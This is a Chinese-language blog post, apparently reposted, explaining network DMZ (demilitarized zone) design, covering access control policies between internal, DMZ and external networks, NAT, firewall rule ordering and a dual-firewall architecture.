在实际的运用中,某些主机需要对外提供服务,为了更好地提供服务,同时又要有效地保护内部网络的安全,将这些需要对外开放的主机与内部的众多网络设备分 隔开来,根据不同的需要,有针对性地采取相应的隔离措施,这样便能在对外提供友好的服务的同时最大限度地保护了内部网络。针对不同资源提供不同安全级别的 保护,可以构建一个DMZ区域,DMZ可以为主机环境提供网络级的保护,能减少为不信任客户提供服务而引发的危险,是放置公共信息的最佳位置。在一个非 DMZ系统中,内部网络和主机的安全通常并不如人们想象的那样坚固,提供给Internet的服务产生了许多漏洞,使其他主机极易受到攻击。但是,通过配 置DMZ,我们可以将需要保护的Web应用程序服务器和数据库系统放在内网中,把没有包含敏感数据、担当代理数据访问职责的主机放置于DMZ中,这样就为 应用系统安全提供了保障。DMZ使包含重要数据的内部系统免于直接暴露给外部网络而受到攻击,攻击者即使初步入侵成功,还要面临DMZ设置的新的障碍。

DMZ网络访问控制策略

当规划一个拥有DMZ的网络时候,我们可以明确各个网络之间的访问关系,可以确定以下六条访问控制策略。

1.内网可以访问外网

内网的用户显然需要自由地访问外网。在这一策略中,防火墙需要进行源地址转换。

2.内网可以访问DMZ

此策略是为了方便内网用户使用和管理DMZ中的服务器。

3.外网不能访问内网

很显然,内网中存放的是公司内部数据,这些数据不允许外网的用户进行访问。

4.外网可以访问DMZ

DMZ中的服务器本身就是要给外界提供服务的,所以外网必须可以访问DMZ.同时,外网访问DMZ需要由防火墙完成对外地址到服务器实际地址的转换。

5.DMZ不能访问内网

很明显,如果违背此策略,则当入侵者攻陷DMZ时,就可以进一步进攻到内网的重要数据。

6.DMZ不能访问外网

此条策略也有例外,比如DMZ中放置邮件服务器时,就需要访问外网,否则将不能正常工作。在网络中,非军事区(DMZ)是指为不信任系统提供服务的孤立网段,其目的是把敏感的内部网络和其他提供访问服务的网络分开,阻止内网和外网直接通信,以保证内网安全。

DMZ服务配置

DMZ提供的服务是经过了地址转换(NAT)和受安全规则限制的,以达到隐蔽真实地址、控制访问的功能。首先要根据将要提供的服务和安全策略建立一个清 晰的网络拓扑,确定DMZ区应用服务器的IP和端口号以及数据流向。通常网络通信流向为禁止外网区与内网区直接通信,DMZ区既可与外网区进行通信,也可 以与内网区进行通信,受安全规则限制。

1 地址转换

DMZ区服务器与内网区、外网区的通信是 经过网络地址转换(NAT)实现的。网络地址转换用于将一个地址域(如专用Intranet)映射到另一个地址域(如Internet),以达到隐藏专用 网络的目的。DMZ区服务器对内服务时映射成内网地址,对外服务时映射成外网地址。采用静态映射配置网络地址转换时,服务用IP和真实IP要一一映射,源 地址转换和目的地址转换都必须要有。

2 DMZ安全规则制定

安全规则集是安全策略的技术实 现,一个可靠、高效的安全规则集是实现一个成功、安全的防火墙的非常关键的一步。如果防火墙规则集配置错误,再好的防火墙也只是摆设。在建立规则集时必须 注意规则次序,因为防火墙大多以顺序方式检查信息包,同样的规则,以不同的次序放置,可能会完全改变防火墙的运转情况。如果信息包经过每一条规则而没有发 现匹配,这个信息包便会被拒绝。一般来说,通常的顺序是,较特殊的规则在前,较普通的规则在后,防止在找到一个特殊规则之前一个普通规则便被匹配,避免防 火墙被配置错误。
DMZ安全规则指定了非军事区内的某一主机(IP地址)对应的安全策略。由于DMZ区内放置的服务器主机将提供公共服务,其地址是公开的,可以被外部网的用户访问,所以正确设置DMZ区安全规则对保证网络安全是十分重要的。
FireGate可以根据数据包的地址、协议和端口进行访问控制。它将每个连接作为一个数据 流,通过规则表与连接表共同配合,对网络连接和会话的当前状态进行分析和监控。其用于过滤和监控的IP包信息主要有:源IP地址、目的IP地址、协议类型 (IP、ICMP、TCP、UDP)、源TCP/UDP端口、目的TCP/UDP端口、ICMP报文类型域和代码域、碎片包和其他标志位(如SYN、 ACK位)等。
为了让DMZ区的应用服务器能与内网中DB服务器(服务端口4004、使用TCP协议)通信,需增加DMZ区安全规则, 这样一个基于DMZ的安全应用服务便配置好了。其他的应用服务可根据安全策略逐个配置。
DMZ无疑是网络安全防御体系中重要组成部分,再加上入侵检测和基于主机的其他安全措施,将极大地提高公共服务及整个系统的安全性。
DMZ是英文“demilitarized zone”的缩写,中文名称为“隔离区”,也称“非军事化区”。它是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题,而设立的一个非安全系统 与安全系统之间的缓冲区,这个缓冲区位于企业内部网络和外部网络之间的小网络区域内,在这个小网络区域内可以放置一些必须公开的服务器设施,如企业Web 服务器、FTP服务器和论坛等。另一方面,通过这样一个DMZ区域,更加有效地保护了内部网络,因为这种网络部署,比起一般的防火墙方案,对攻击者来说又 多了一道关卡。网络结构如下图所示。
网络设备开发商,利用这一技术,开发出了相应的防火墙解决方案。称“非军事区结构模式”。DMZ通常是一个过滤的子网,DMZ在内部网络和外部网络之间构造了一个安全地带。网络结构如下图所示。
DMZ防火墙方案为要保护的内部网络增加了一道安全防线,通常认为是非常安全的。同时它提供了 一个区域放置公共服务器,从而又能有效地避免一些互联应用需要公开,而与内部安全策略相矛盾的情况发生。在DMZ区域中通常包括堡垒主机、Modem池, 以及所有的公共服务器,但要注意的是电子商务服务器只能用作用户连接,真正的电子商务后台数据需要放在内部网络中。

在这个防火墙方案中,包括两个防火墙,外部防火墙抵挡外部网络的攻击,并管理所有内部网络对 DMZ的访问。内部防火墙管理DMZ对于内部网络的访问。内部防火墙是内部网络的第三道安全防线(前面有了外部防火墙和堡垒主机),当外部防火墙失效的时 候,它还可以起到保护内部网络的功能。而局域网内部,对于 Internet的访问由内部防火墙和位于DMZ的堡垒主机控制。在这样的结构里,一个黑客必须通过三个独立的区域(外部防火墙、内部防火墙和堡垒主机) 才能够到达局域网。攻击难度大大加强,相应内部网络的安全性也就大大加强,但投资成本也是最高的。

Continue reading 【转】DMZ(Demilitarized Zone)即俗称的隔离区或非军事区

Pagination


Total views.

© 2013 - 2019. All rights reserved.

Powered by Hydejack v6.6.1